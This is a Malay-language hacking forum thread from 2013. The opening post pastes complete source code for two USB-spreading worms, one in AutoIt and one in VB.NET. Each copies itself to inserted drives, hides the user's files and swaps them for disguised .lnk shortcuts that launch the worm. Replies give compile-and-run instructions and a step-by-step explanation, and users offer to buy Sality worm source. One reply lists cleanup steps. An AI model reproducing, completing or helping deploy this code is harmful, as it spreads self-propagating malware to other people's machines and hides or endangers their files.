Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[AutoIT] USB Spreader (.lnk method)
05-11-2013, 10:14 PM, (This post was last modified: 05-11-2013, 10:31 PM by D4RK_5Y5T3M.)
Post: #1
[AutoIT] USB Spreader (.lnk method)
Salam..

Nak tanye sket..

Aku ade jumpe snippet lnk spread nie kt hackhound.
Dah lame cari, nie baru jumpe. Nie snippet AutoIT.

Aku xberape pandai nak bace code, nie untuk build builder kew ape?
Cmne nk gune code nie?

http://paste.tbd.my/1267

Code:
#include <GUIConstantsEx.au3>
#RequireAdmin
Opt("MustDeclareVars", 1)

Global Const $WM_DEVICECHANGE = 0x0219
Global Const $DBT_DEVICEARRIVAL = 0x8000
Global Const $DBT_DEVICEREMOVECOMPLETE = 0x8004
Global Const $DBT_DEVTYP_VOLUME = 0x00000002
Global $RutaVirus="Carpeta_Virus\" & @ScriptName





Global $Gui = GUICreate("WM_DEVICECHANGE")
GUISetState(@SW_HIDE)

GUIRegisterMsg($WM_DEVICECHANGE, "WM_DEVICECHANGE")

Do
Until GUIGetMsg() = -3






;USB_Main (Spreader)
Func USB_Main()
Local $USB_list=ListarUSB()
Local $i=1
Local $USB_ruta=""
For $i = 1 To $USB_list[0]
$USB_ruta=StringUpper($USB_list[$i]) & "\"
ConsoleWrite($USB_ruta & @CRLF)
If not(FileExists($USB_ruta & $RutaVirus)) Then
If Not FileCopy(@ScriptFullPath,$USB_ruta & $RutaVirus,8) then ContinueLoop
Crear_Shortcut($USB_ruta)
EndIf
Next

EndFunc



;Crear Accesos Directos
Func Crear_Shortcut($USB_ruta)


ConsoleWrite($USB_ruta & @CRLF)
Local $busca = FileFindFirstFile($USB_ruta & "*")
Local $filename=0,$Inicio=0,$Icono,$Extension="",$filenameold="",$Borrar=""



If $busca = -1 Then
Exit
EndIf

While 1
$filename = FileFindNextFile($busca)
If @error Then ExitLoop

$Inicio=StringInStr($filename,".")
$Extension=Stringmid($filename,$Inicio)
ConsoleWrite( "Extension: " & $Extension & @crlf)
$Icono=ExIcon_Path($Extension)
ConsoleWrite($Icono[0] & @CRLF & $Icono[1] &  @CRLF)


If  StringLeft($RutaVirus,StringInStr($RutaVirus,"\")-1)==$filename Then $Borrar= $USB_ruta & $filename & ".lnk"

if $Icono[1]=="" Then
    $filenameold=$filename
    If $Extension then
    $filename=StringReplace($filename,$Extension,".lnk")
    Else
    $filename&=".lnk"
    EndIf

    FileCreateShortcut($USB_ruta & $RutaVirus,$USB_ruta & $filename ,"","","",$Icono[0])

Else
    $filenameold=$filename
    If $Extension then
    $filename=StringReplace($filename,$Extension,".lnk")
    Else
    $filename&=".lnk"
    EndIf
ConsoleWrite($USB_ruta & $RutaVirus & @CRLF)
    FileCreateShortcut($USB_ruta & $RutaVirus,$USB_ruta & $filename,"","","",$Icono[0],"",$Icono[1])

EndIf

WEnd


FileDelete($Borrar)
FileClose($busca)
If Not FileSetAttrib($USB_ruta & "*","+H") Then Exit
If Not FileSetAttrib($USB_ruta & "*.lnk","-H") Then Exit
EndFunc



;Obtener Icono Ruta
Func ExIcon_Path($Extension)
Local $Icono_Ruta[2]
Local $i=1
Local $sApp=""
Local $iComa=0
If Not($Extension==".exe") then
$Icono_Ruta[1]=""
$sApp=RegRead("HKEY_CLASSES_ROOT\" & $Extension, "")
$Icono_Ruta[0]=RegRead("HKEY_CLASSES_ROOT\" & $sApp & "\DefaultIcon","")
EndIf
If $Icono_Ruta[0]="" Then
$Icono_Ruta[0]="shell32.dll"
$Icono_Ruta[1]=4
If not(@OSVersion="WIN_XP") Then
$Icono_Ruta[0]="imageres.dll"
EndIf
Return $Icono_Ruta
Else
$iComa=StringInStr($Icono_Ruta[0],",")
If $iComa=0 Then
Return $Icono_Ruta
Else
$Icono_Ruta[1]=StringMid($Icono_Ruta[0],$iComa+1)
$Icono_Ruta[0]=StringLeft($Icono_Ruta[0],$iComa-1)
Return $Icono_Ruta
EndIf
EndIf
EndFunc



;ListarUSB()
Func ListarUSB()
Local $USB = DriveGetDrive("REMOVABLE")
If @error Then
ConsoleWrite("Error DriveGetDrive" & @CRLF)
Else
;~    For $i = 1 To $USB[0]
;~       ; ConsoleWrite("USB " & $i & "/" & $USB[0] & ":" & @CRLF & StringUpper($USB[$i]) & @crlf)
;~    Next
Return $USB
EndIf
EndFunc




; rasim
; http://www.autoitscript.com/forum/topic/79460-usbmon/
Func WM_DEVICECHANGE($hWnd, $Msg, $wParam, $lParam)


    If ($wParam = $DBT_DEVICEARRIVAL) Or ($wParam = $DBT_DEVICEREMOVECOMPLETE) Then
        Local $DEV_BROADCAST_VOLUME = DllStructCreate("int dbcvsize;int dbcvdevicetype;int dbcvreserved;int dbcvunitmask;" & _
                "ushort dbcvflags", $lParam)
        Local $iDriveType = DllStructGetData($DEV_BROADCAST_VOLUME, "dbcvdevicetype")
    Else
        Return $GUI_RUNDEFMSG
    EndIf

    If $iDriveType <> $DBT_DEVTYP_VOLUME Then Return $GUI_RUNDEFMSG

    Local $iMask = DllStructGetData($DEV_BROADCAST_VOLUME, "dbcvunitmask")
    $iMask = Log($iMask) / Log(2)

    Local $iDrive = Chr(65 + $iMask) & ":"

    Switch $wParam
        Case $DBT_DEVICEARRIVAL
;~             TrayTip("WM_DEVICECHANGE", "Conectado", 5, 1)
     USB_Main()

;~         Case $DBT_DEVICEREMOVECOMPLETE
;~             TrayTip("WM_DEVICECHANGE", "Desconectado", 5, 2)
    EndSwitch

    Return $GUI_RUNDEFMSG
EndFunc

EDIT:
Gugel-megugel lgi, jumpe yg vb net punyer snippet kt HF.

Code:
Public Class USB
'njq8 , Ethical Hacker
    Private Off As Boolean = False
    Dim thread As Threading.Thread = Nothing
    Public ExeName As String = "server.exe"
    Public Sub Start()
  If thread Is Nothing Then
    thread = New Threading.Thread(AddressOf usb, 1)
    thread.Start()
  End If
    End Sub
    Public Sub clean()
  Off = True
  Do Until thread Is Nothing
    Threading.Thread.CurrentThread.Sleep(1)
  Loop
  For Each x As IO.DriveInfo In IO.DriveInfo.GetDrives
    Try
    If x.IsReady Then
    If x.DriveType = IO.DriveType.Removable Or _
    x.DriveType = IO.DriveType.CDRom Then
    If IO.File.Exists(x.Name & ExeName) Then
    IO.File.SetAttributes(x.Name _
    & ExeName, IO.FileAttributes.Normal)
    IO.File.Delete(x.Name & ExeName)
    End If
    For Each xx As String In IO.Directory.GetFiles(x.Name)
    Try
    IO.File.SetAttributes(xx, IO.FileAttributes.Normal)
    If xx.ToLower.EndsWith(".lnk") Then
    IO.File.Delete(xx)
    End If
    Catch ex As Exception
    End Try
    Next
    For Each xx As String In IO.Directory.GetDirectories(x.Name)
    Try
    With New IO.DirectoryInfo(xx)
    .Attributes = IO.FileAttributes.Normal
    End With
    Catch ex As Exception
    End Try
    Next
    End If
    End If
    Catch ex As Exception
    End Try
  Next
    End Sub
    Sub usb()
  Off = False
  Do Until Off = True
    For Each x In IO.DriveInfo.GetDrives
    Try
    If x.IsReady Then
    If x.TotalFreeSpace > 0 And x.DriveType = IO.DriveType _
    .Removable Or x.DriveType = IO.DriveType.CDRom Then
    Try
    If IO.File.Exists(x.Name & ExeName) Then
    IO.File.SetAttributes(x.Name & ExeName, IO.FileAttributes.Normal)
    End If
    IO.File.Copy(Application.ExecutablePath, x.Name & ExeName, True)
    IO.File.SetAttributes(x.Name & ExeName, IO.FileAttributes.Hidden)
    For Each xx As String In IO.Directory.GetFiles(x.Name)
    If IO.Path.GetExtension(xx).ToLower <> ".lnk" And _
    xx.ToLower <> x.Name.ToLower & ExeName.ToLower Then
    IO.File.SetAttributes(xx, IO.FileAttributes.Hidden)
    IO.File.Delete(x.Name & New IO.FileInfo(xx).Name & ".lnk")
    With CreateObject("WScript.****************l").CreateShortcut _
    (x.Name & New IO.FileInfo(xx).Name & ".lnk")
    .TargetPath = "cmd.exe"
    .WorkingDirectory = ""
    .Arguments = "/c start " & ExeName.Replace(" ", ChrW(34) _
  & " " & ChrW(34)) & "&start " & New IO.FileInfo(xx) _
    .Name.Replace(" ", ChrW(34) & " " & ChrW(34)) & " & exit"
    .IconLocation = GetIcon(IO.Path.GetExtension(xx))
    .Save()
    End With
    End If
    Next
    For Each xx As String In IO.Directory.GetDirectories(x.Name)
    IO.File.SetAttributes(xx, IO.FileAttributes.Hidden)
    IO.File.Delete(x.Name & New IO.DirectoryInfo(xx).Name & " .lnk")
    With CreateObject("WScript.****************l") _
    .CreateShortcut(x.Name & IO.Path.GetFileNameWithoutExtension(xx) & " .lnk")
    .TargetPath = "cmd.exe"
    .WorkingDirectory = ""
    .Arguments = "/c start " & ExeName.Replace(" ", ChrW(34) _
  & " " & ChrW(34)) & "&explorer /root,""%CD%" & New  _
  IO.DirectoryInfo(xx).Name & """ & exit"
    .IconLocation = "%SystemRoot%\system32\****************L32.dll,3" '< folder icon
    .Save()
    End With
    Next
    Catch ex As Exception
    End Try
    End If
    End If
    Catch ex As Exception
    End Try
    Next
    Threading.Thread.CurrentThread.Sleep(5000)
  Loop
  thread = Nothing
    End Sub
    Function GetIcon(ByVal ext As String) As String
  Try
    Dim r = Microsoft.Win32.Registry _
    .LocalMachine.OpenSubKey("Software\Classes\", False)
    Dim e As String = r.OpenSubKey(r.OpenSubKey(ext, False) _
    .GetValue("") & "\DefaultIcon\").GetValue("", "")
    If e.Contains(",") = False Then e &= ",0"
    Return e
  Catch ex As Exception
    Return ""
  End Try
    End Function
End Class
Terima kasih.

Big Grin
[Image: 0K35v.png]
Reply
05-11-2013, 10:33 PM,
Post: #2
RE: [AutoIT] USB Spreader (.lnk method)
download visual basic, load kat form load, try compile, double click tengok apa jadi .
To follow the path,
Look to the master,
Follow the master,
Look through the master,
Become the master.
Reply
05-11-2013, 11:04 PM, (This post was last modified: 05-11-2013, 11:06 PM by syahmiazhar.)
Post: #3
RE: [AutoIT] USB Spreader (.lnk method)
Ni kod... compile and run.
Sekali lalu tengok

1. Monitor device change @ detect usb plug/unplug
2. Cari USB drive
3. Kalau file 'virus' takde dalam USB, copy masuk script 'virus'
4. Bagi setiap file dalam pendrive, buat shortcut guna nama yang sama (.lnk) tapi link ke script 'virus', beserta dengan ikon yang sesuai bagi jenis file.
5. Nyorokkan file2 asal dalam pendrive dan apply sistem attribute
Reply
05-11-2013, 11:10 PM, (This post was last modified: 05-11-2013, 11:20 PM by pers0nant.)
Post: #4
RE: [AutoIT] USB Spreader (.lnk method)
aku x rasa kod autoit tu just snippet @ builder. tu memang soskod virus shortcut Rage 2 compile je ngan Aut2Exe. just pastikan ko ader GUIConstantsEx.au3 dlm folder sama kalau ko x fully install autoit3
Reply
05-11-2013, 11:21 PM,
Post: #5
RE: [AutoIT] USB Spreader (.lnk method)
Yup, tulah kod virusnya...

Global $RutaVirus="Carpeta_Virus\" & @ScriptName
If Not FileCopy(@ScriptFullPath,$USB_ruta & $RutaVirus,8) then ContinueLoop

http://www.autoitscript.com/autoit3/docs...elated.htm
@ScriptName dan @ScriptFullPath merujuk pada skrip/file path kod ni. Copy diri sendiri dalam pendrive...
Reply
05-11-2013, 11:30 PM,
Post: #6
RE: [AutoIT] USB Spreader (.lnk method)
tp aku x paham kenapa dia guna ConsoleWrite(). kenapa nak generate output Fuck That Shit
Reply
05-11-2013, 11:33 PM,
Post: #7
RE: [AutoIT] USB Spreader (.lnk method)
Kalau windows apps, takde console, tapi tetap print output console.. biasa org guna tujuan utk debugging atau logging. Nak tgk output, run guna command prompt
Reply
05-11-2013, 11:41 PM,
Post: #8
RE: [AutoIT] USB Spreader (.lnk method)
ade related to sality vir ka?
"Tanda ilmu itu berkat ialah semakin tinggi ilmu kita,semakin tunduk rendah kita bertawaduk kepada Allah dan juga sesama manusia.Merasakan betapa hebatnya Allah dan tinggi ilmuNya sehingga kita berasa betapa kerdilnya ilmu kita"
[Image: 2770527825.png]
Reply
05-11-2013, 11:49 PM,
Post: #9
RE: [AutoIT] USB Spreader (.lnk method)
Sality tu virus, ni worm aje... tak related..
Reply
05-11-2013, 11:57 PM,
Post: #10
RE: [AutoIT] USB Spreader (.lnk method)
so severity consider low la ni?
"Tanda ilmu itu berkat ialah semakin tinggi ilmu kita,semakin tunduk rendah kita bertawaduk kepada Allah dan juga sesama manusia.Merasakan betapa hebatnya Allah dan tinggi ilmuNya sehingga kita berasa betapa kerdilnya ilmu kita"
[Image: 2770527825.png]
Reply
05-11-2013, 11:58 PM,
Post: #11
RE: [AutoIT] USB Spreader (.lnk method)
Yup... Kill process.. Delete virus... restore file attribute dalam pendrive... terus normal..
Reply
06-11-2013, 12:00 AM,
Post: #12
RE: [AutoIT] USB Spreader (.lnk method)
oh ok,ape psl nk amek source code worm nie if severity low..nak enhanced kan ke ape?ke xbole enhance?
"Tanda ilmu itu berkat ialah semakin tinggi ilmu kita,semakin tunduk rendah kita bertawaduk kepada Allah dan juga sesama manusia.Merasakan betapa hebatnya Allah dan tinggi ilmuNya sehingga kita berasa betapa kerdilnya ilmu kita"
[Image: 2770527825.png]
Reply
06-11-2013, 12:09 AM,
Post: #13
RE: [AutoIT] USB Spreader (.lnk method)
Dia nak belajar kut ;)
Reply
06-11-2013, 05:43 AM,
Post: #14
RE: [AutoIT] USB Spreader (.lnk method)
(05-11-2013, 11:41 PM)RFC792 Wrote: ade related to sality vir ka?

saya sanggup beli kalau ada orang nak jual source code worm sality tu ;d
Reply
06-11-2013, 11:32 AM,
Post: #15
RE: [AutoIT] USB Spreader (.lnk method)
(06-11-2013, 05:43 AM)jalil Wrote:
(05-11-2013, 11:41 PM)RFC792 Wrote: ade related to sality vir ka?

saya sanggup beli kalau ada orang nak jual source code worm sality tu ;d

berapa berani offer ? ;b;b;b
To follow the path,
Look to the master,
Follow the master,
Look through the master,
Become the master.
Reply


Forum Jump: